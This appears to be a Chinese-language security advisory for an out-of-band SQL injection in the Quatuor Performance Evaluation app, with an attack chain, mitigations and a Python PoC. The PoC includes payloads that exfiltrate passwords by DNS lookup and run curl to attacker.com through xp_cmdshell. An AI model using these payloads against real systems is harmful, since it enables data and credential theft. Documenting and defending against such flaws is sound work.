CVE-2026-1479 CVSS 7.5 高危

CVE-2026-1479: Quatuor绩效评估系统带外SQL注入漏洞

披露日期: 2026-01-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-1479

漏洞类型

SQL注入

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Quatuor Performance Evaluation (EDD) application by Gabinete Técnico de Programación

漏洞概述

CVE-2026-1479是Quatuor绩效评估系统中的一个高危带外SQL注入漏洞，CVSS评分达到7.5。该漏洞由西班牙国家网络安全研究所(INCIBE-CERT)协调披露。攻击者可通过构造恶意SQLpayload，利用系统中的Id_usuario和Id_evaluacion参数，在无需认证的情况下远程利用此漏洞。由于是带外(OOB)SQL注入，攻击者无法直接从应用程序响应中获取数据，而是通过外部通道(如DNS请求、HTTP请求等)间接提取数据库敏感信息。该漏洞严重影响系统数据的机密性，可能导致用户个人信息、评估数据等敏感内容泄露，对组织信息安全构成严重威胁。

技术细节

该漏洞存在于Quatuor绩效评估应用的/evaluacion_hca_ver_auto.asp页面中，具体受影响的参数为Id_usuario和Id_evaluacion。攻击者构造带有SQL注入payload的HTTP请求，由于应用程序未对用户输入进行充分的参数化查询或输入过滤，恶意SQL语句被直接传入数据库执行。区别于传统SQL注入，带外SQL注入利用数据库的特定功能(如Oracle的UTL_HTTP、SQL Server的xp_cmdshell、MySQL的LOAD_FILE等)将查询结果编码后通过DNS解析或HTTP请求发送到攻击者控制的外部服务器。由于应用程序响应中不直接包含查询结果，这种攻击方式更难被传统WAF和安全设备检测。攻击者可利用此漏洞枚举数据库结构、提取用户凭证、访问其他敏感表数据。

攻击链分析

STEP 1

步骤1

攻击者识别目标Quatuor绩效评估系统，访问/evaluacion_hca_ver_auto.asp端点

STEP 2

步骤2

构造包含SQL注入payload的HTTP请求，在Id_usuario或Id_evaluacion参数中嵌入恶意SQL语句

STEP 3

步骤3

payload利用数据库函数(如UTL_HTTP、xp_cmdshell等)发起外部网络请求，将查询结果编码在DNS查询或HTTP请求中

STEP 4

步骤4

攻击者控制的DNS服务器或Web服务接收编码的数据库响应数据

STEP 5

步骤5

解码接收到的数据，提取目标数据库中的敏感信息(用户凭证、评估数据等)

STEP 6

步骤6

利用获取的凭证进行进一步横向移动或持久化控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import base64

# CVE-2026-1479 OOB SQL Injection PoC
# Target: Quatuor Performance Evaluation (EDD)
# Endpoint: /evaluacion_hca_ver_auto.asp
# Vulnerable Parameters: Id_usuario, Id_evaluacion

target_url = "http://target-server/evaluacion_hca_ver_auto.asp"

# DNS exfiltration payload for Oracle DB
dns_payload = "'; SELECT UTL_INADDR.get_host_address((SELECT password FROM users WHERE rownum=1)||'.attacker.com') FROM dual--"

# HTTP exfiltration payload for MSSQL DB
http_payload = "'; DECLARE @data VARCHAR(8000); SELECT @data=db_name(); EXEC('xp_cmdshell "curl http://attacker.com/'+@data+'";')--"

params = {
    'Id_usuario': dns_payload,
    'Id_evaluacion': '1'
}

try:
    response = requests.get(target_url, params=params, timeout=10)
    print(f"[*] Request sent to {target_url}")
    print(f"[*] Payload: {dns_payload}")
except requests.exceptions.RequestException as e:
    print(f"[!] Error: {e}")

影响范围

Quatuor Performance Evaluation (EDD) application - 所有版本

防御指南

临时缓解措施

在官方修复方案发布前，可采取以下临时缓解措施：1)通过Web应用防火墙规则暂时拦截包含SQL注入特征的请求；2)对/evaluacion_hca_ver_auto.asp页面实施访问控制，限制暴露范围；3)监控数据库异常查询日志；4)考虑暂时禁用受影响功能模块；5)部署入侵检测系统监控带外数据泄露指标。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表